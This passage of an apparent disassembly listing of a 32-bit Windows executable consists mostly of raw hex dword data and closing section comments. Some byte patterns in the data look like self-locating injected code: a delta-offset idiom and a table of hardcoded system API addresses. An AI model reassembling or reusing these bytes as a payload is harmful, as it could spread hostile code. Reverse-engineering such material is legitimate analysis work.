dd 0FFFFFFEh, 0A382h, 0FE97E800h, 0A2E8FFFFh, 8B000000h
dd 4028319Dh, 0FDB5E800h, 840FFFFFh, 88h, 282DB58Bh, 5E8B0040h
dd 0E8DE033Ch, 0FFFFFE9Eh, 4A817672h, 6024h, 56FE8BE0h
dd 8D147A03h, 401000B5h, 107A0300h, 501B9h, 0A5F35700h
dd 2E303B1h, 5E5FA4F3h, 92310F52h, 155878Dh, 50880000h
dd 0EECBE8FFh, 8B5AFFFFh, 4A030C4Ah, 5418D10h, 8928432Bh
dd 46C71247h, 20202020h, 284B8920h, 8B104A8Bh, 40283185h
dd 84A3900h, 4A890373h, 10420108h, 586383h, 2835858Bh
dd 42010040h, 50430108h, 8B64D233h, 28F6422h, 11BD8358h
dd 4028h, 0FDE2840Fh, 0B5FFFFFFh, 40282Dh, 248795FFh, 0B5FF0040h
dd 402829h, 240795FFh, 8D8D0040h, 402815h, 281D958Dh, 52510040h
dd 0B5FF006Ah, 402811h, 247F95FFh, 0B5FF0040h, 402811h
dd 240795FFh, 0B58D0040h, 402709h, 280DB5FFh, 0FF560040h
dd 40247B95h, 11A58300h, 4028h, 0E8C3h, 6A5D0000h, 2EED8101h
dd 58004023h, 85C10FF0h, 401480h, 83C3C085h, 0FF0FFC8h
dd 148085C1h, 3DC30040h, 2A0010h, 81661C75h, 6C0C247Ch
dd 60137571h, 0FFFFC4E8h, 0E80575FFh, 0FFFFFDC2h, 0FFFFD2E8h
dd 0FF2E61FFh, 3456782Dh, 0AAE86012h, 75FFFFFFh, 24448B39h
dd 9B58D30h, 8B004027h, 81660850h, 7302063Ah, 685625h
dd 8B00FF00h, 52006AC4h, 0B395FF50h, 83004024h, 3E8108C4h
dd 5C3F3F5Ch, 0C6830375h, 0FD74E804h, 84E8FFFFh, 61FFFFFFh
dd 25B8h, 2FB8C300h, 0E8000000h, 10h, 0B80020C2h, 30h
dd 3E8h, 24C200h, 0C24548Dh, 0F8832ECDh, 60197C00h, 0E8h
dd 24548B00h, 1A8B5D30h, 23F1ED81h, 4E80040h, 61FFFFF4h
dd 630004C2h, 0DE77E779h, 7D77E737h, 0FD77F515h, 77E7A5h
dd 2 dup(0)
dd 72000000h, 3777E746h, 9777E7A8h, 0B877E777h, 8377E61Bh
dd 3777E7AAh, 0E777E7ACh, 4977EBB1h, 0AB77E73Ch, 0EF77E74Ch
dd 0E277E793h, 9377E73Ch, 8F77E79Fh, 3477E6AFh, 8677E6ADh
dd 5777E7C4h, 0D877E7C6h, 7677E805h, 1577E74Dh, 0B777E7C8h
dd 9577E706h, 0E977EBA5h, 9677EBA6h, 1A77E703h, 0E677E701h
dd 9077E61Bh, 0A77E750h, 8C77E798h, 6377E79Dh, 377F7E4h
dd 0A377F7E6h, 0B377F7E6h, 7377F7E6h, 6377F7EAh, 4377F7EBh
dd 377F7ECh, 3377F7F5h, 77F526h, 12A5h dup(0)
dword_4E414C dd 2Dh dup(0) ; DATA XREF: .data:off_43ACE4�o
_sxdata ends
; Section 5. (virtual address 000E5000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 000E4200
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata2 segment para public 'DATA' use32
assume cs:_idata2
;org 4E5000h
align 2000h
_idata2 ends
end start